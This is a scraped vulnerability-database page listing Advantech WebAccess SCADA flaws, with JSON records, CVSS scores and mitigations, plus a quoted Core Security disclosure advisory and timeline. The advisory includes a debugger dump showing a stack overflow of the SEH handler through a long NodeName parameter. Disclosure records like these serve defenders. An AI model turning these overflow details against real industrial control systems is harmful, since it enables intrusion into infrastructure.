Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-529", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-529", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4084", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-529", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ] }, "id": "VAR-201708-1692", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:02:25.642000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-529", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-529", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-529", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess RtspVapgDecoderNew2 PMSettingData3D Width Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-529" } ], "trust": 0.7 } }
var-201904-0334
Vulnerability from variot
Advantech WebAccess 8.3.4 allows unauthenticated, remote attackers to delete arbitrary files via IOCTL 10005 RPC. Advantech WebAccess Contains an access control vulnerability.Information may be tampered with. Advantech WebAccess is a browser-based HMI/SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. An arbitrary file-download vulnerability 2. An arbitrary file-upload vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.3.4 is vulnerable; other versions may also be affected. This vulnerability stems from network systems or products not properly restricting access to resources from unauthorized roles
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201904-0334", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 2.4, "vendor": "advantech", "version": "8.3.4" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.4" } ], "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "NVD", "id": "CVE-2019-3941" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-003250" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tenable", "sources": [ { "db": "BID", "id": "107847" }, { "db": "CNNVD", "id": "CNNVD-201904-479" } ], "trust": 0.9 }, "cve": "CVE-2019-3941", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2019-3941", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2019-32475", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-155376", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2019-3941", "impactScore": 3.6, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3941", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-3941", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2019-32475", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201904-479", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-155376", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "VULHUB", "id": "VHN-155376" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "CNNVD", "id": "CNNVD-201904-479" }, { "db": "NVD", "id": "CVE-2019-3941" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.4 allows unauthenticated, remote attackers to delete arbitrary files via IOCTL 10005 RPC. Advantech WebAccess Contains an access control vulnerability.Information may be tampered with. Advantech WebAccess is a browser-based HMI/SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. An arbitrary file-download vulnerability\n2. An arbitrary file-upload vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.3.4 is vulnerable; other versions may also be affected. This vulnerability stems from network systems or products not properly restricting access to resources from unauthorized roles", "sources": [ { "db": "NVD", "id": "CVE-2019-3941" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "BID", "id": "107847" }, { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "VULHUB", "id": "VHN-155376" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3941", "trust": 3.6 }, { "db": "TENABLE", "id": "TRA-2019-15", "trust": 3.4 }, { "db": "BID", "id": "107847", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201904-479", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32475", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-003250", "trust": 0.8 }, { "db": "IVD", "id": "977C7FA4-F2FA-4903-84F3-E97660225D1F", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155376", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "VULHUB", "id": "VHN-155376" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "CNNVD", "id": "CNNVD-201904-479" }, { "db": "NVD", "id": "CVE-2019-3941" } ] }, "id": "VAR-201904-0334", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "VULHUB", "id": "VHN-155376" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" } ] }, "last_update_date": "2024-11-23T22:12:06.897000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech WebAccess Access Control Error Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181483" }, { "title": "Advantech WebAccess Fixes for access control error vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=91306" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "CNNVD", "id": "CNNVD-201904-479" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-306", "trust": 1.1 }, { "problemtype": "CWE-284", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155376" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "NVD", "id": "CVE-2019-3941" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "trust": 2.3, "url": "http://www.securityfocus.com/bid/107847" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3941" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3941" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "VULHUB", "id": "VHN-155376" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "CNNVD", "id": "CNNVD-201904-479" }, { "db": "NVD", "id": "CVE-2019-3941" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "VULHUB", "id": "VHN-155376" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "db": "CNNVD", "id": "CNNVD-201904-479" }, { "db": "NVD", "id": "CVE-2019-3941" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32475" }, { "date": "2019-04-09T00:00:00", "db": "VULHUB", "id": "VHN-155376" }, { "date": "2019-04-03T00:00:00", "db": "BID", "id": "107847" }, { "date": "2019-05-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "date": "2019-04-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-479" }, { "date": "2019-04-09T16:29:02.147000", "db": "NVD", "id": "CVE-2019-3941" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32475" }, { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-155376" }, { "date": "2019-04-03T00:00:00", "db": "BID", "id": "107847" }, { "date": "2019-05-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003250" }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-479" }, { "date": "2024-11-21T04:42:54.673000", "db": "NVD", "id": "CVE-2019-3941" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-479" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Access Control Error Vulnerability", "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNVD", "id": "CNVD-2019-32475" }, { "db": "CNNVD", "id": "CNNVD-201904-479" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Access control error", "sources": [ { "db": "IVD", "id": "977c7fa4-f2fa-4903-84f3-e97660225d1f" }, { "db": "CNNVD", "id": "CNNVD-201904-479" } ], "trust": 0.8 } }
var-201409-0443
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the AccessCode2 parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0443", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "CNNVD", "id": "CNNVD-201409-736" }, { "db": "NVD", "id": "CVE-2014-0989" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004356" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69534" } ], "trust": 0.3 }, "cve": "CVE-2014-0989", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": 